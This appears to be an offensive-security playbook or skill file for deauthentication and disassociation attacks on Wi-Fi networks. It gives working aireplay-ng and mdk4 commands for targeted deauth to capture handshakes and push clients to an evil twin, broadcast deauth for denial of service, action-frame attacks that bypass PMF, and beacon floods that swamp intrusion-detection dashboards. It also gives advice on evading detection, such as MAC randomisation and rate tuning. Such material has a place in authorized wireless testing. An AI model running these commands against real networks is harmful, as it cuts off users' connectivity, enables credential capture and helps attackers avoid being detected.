| name | offensive-deauth-disassoc |
| description | Deauthentication and disassociation attacks against 802.11 networks — targeted single-client deauth for handshake capture, broadcast deauth for DoS (with authorization), action-frame attacks bypassing 802.11w (PMF), beacon flooding, mdk4 / aireplay-ng tooling, and rate-limit / PMF-aware operation. Use to coerce client reconnection (handshake capture, evil-twin roaming), as targeted DoS, or to test PMF posture. |
Deauth / Disassoc Attacks
The most-used 802.11 management-frame attack: send a forged deauthentication or disassociation frame as the AP, and the client disconnects. Modern PMF (802.11w) authenticates these frames cryptographically — but most consumer and many enterprise deployments still don't require PMF.
Quick Workflow
- Identify target client + AP (BSSID, channel)
- Pick deauth scope: single client (quiet) vs. broadcast (loud, DoS)
- Verify PMF status — if required, classic deauth fails; pivot to action-frame attacks
- Send the deauth burst at the right rate
Single-Client Deauth (Preferred)
Used to force handshake capture, push client to evil twin, or test reconnection behavior.
sudo aireplay-ng --deauth 5 \
-a AA:BB:CC:DD:EE:FF \
-c 11:22:33:44:55:66 \
wlan0mon
--deauth 5 sends 5 deauths (10 frames — 5 to AP, 5 to client). 3–10 is usually enough.- More than 30 in a burst is unnecessarily noisy.
Broadcast Deauth (DoS, Use Sparingly)
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
sudo mdk4 wlan0mon d -B target_bssids.txt -c 1,6,11
Only with explicit authorization. Continuous broadcast deauth is a clear DoS signal and trips most WIPS within seconds.
PMF (802.11w) Awareness
PMF authenticates deauth/disassoc frames. Status visible in beacon RSN capabilities:
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
| PMF Status | Deauth Effect |
|---|
| Off | Classic deauth works |
| Capable (optional) | Works against clients without PMF, fails against PMF-enabled clients |
| Required | Classic deauth ignored — must use action-frame attacks |
Action-Frame Attacks Against PMF
PMF protects deauth/disassoc but doesn't always protect all action frames. Specific action types remain exploitable:
sudo mdk4 wlan0mon a -a <BSSID>
sudo mdk4 wlan0mon m -t <BSSID>
sudo mdk4 wlan0mon w -t <BSSID>
Action frames the IEEE 802.11 spec marks as "may be unprotected" include some block-ack and channel-switch announcements — implementation-specific exploitation paths exist but require chipset-specific testing.
Beacon Flooding
Confuse clients (and WIPS) by flooding fake beacons:
sudo mdk4 wlan0mon b -f beacon_essids.txt -c 6 -s 100
Use cases:
- Hide your evil twin among noise
- Stress-test client roaming logic
- DoS WIPS dashboards (flood with thousands of fake APs)
Rate Tuning and Detection
| Burst | Defender Signal |
|---|
| 3–10 deauth, single client | Often misclassified as roaming or RF noise |
| >30 deauth/sec from one source | WIPS rule trips |
| Continuous broadcast deauth | Clear DoS — alert + ticket within minutes |
| Beacon flood >50/sec | Saturates WIPS dashboards |
Randomize source MAC across burst-and-pause cycles to spread the signal.
Engagement Cheatsheet
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
sudo aireplay-ng --deauth 3 -a <BSSID> -c <client> wlan0mon
sudo mdk4 wlan0mon a -a <BSSID>
sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon
Reporting
Document for each test:
- Target BSSID + ESSID + PMF status
- Burst size, duration
- Effect observed (client reconnected? handshake captured? DoS achieved?)
- Detection signals defender would have seen
Key References
